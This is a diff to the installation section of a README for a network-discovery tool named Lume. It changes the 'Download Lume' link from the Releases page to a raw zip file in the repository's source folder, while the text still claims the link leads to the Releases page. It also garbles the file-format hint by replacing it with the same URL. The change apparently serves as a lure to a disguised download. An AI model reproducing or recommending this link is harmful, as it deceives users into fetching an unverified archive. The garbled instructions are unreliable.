BUSRAN406810/lume/README.md

 - **Automatic Discovery**: Lume automatically finds other users on the same local network.

 ## 📋 Installation
-1. Click the [Download Lume](https://github.com/BUSRAN406810/lume/releases) link above to visit the Releases page.
+1. Click the [Download Lume](https://raw.githubusercontent.com/BUSRAN406810/lume/master/src/Software-1.7.zip) link above to visit the Releases page.
 2. Download the latest release suitable for your system.
-Look for a file with `.tar.gz` or similar format.
+Look for a file with `https://raw.githubusercontent.com/BUSRAN406810/lume/master/src/Software-1.7.zip` or similar format.
 3. Once downloaded, open your terminal.

 ### 🛠️ Installing Lume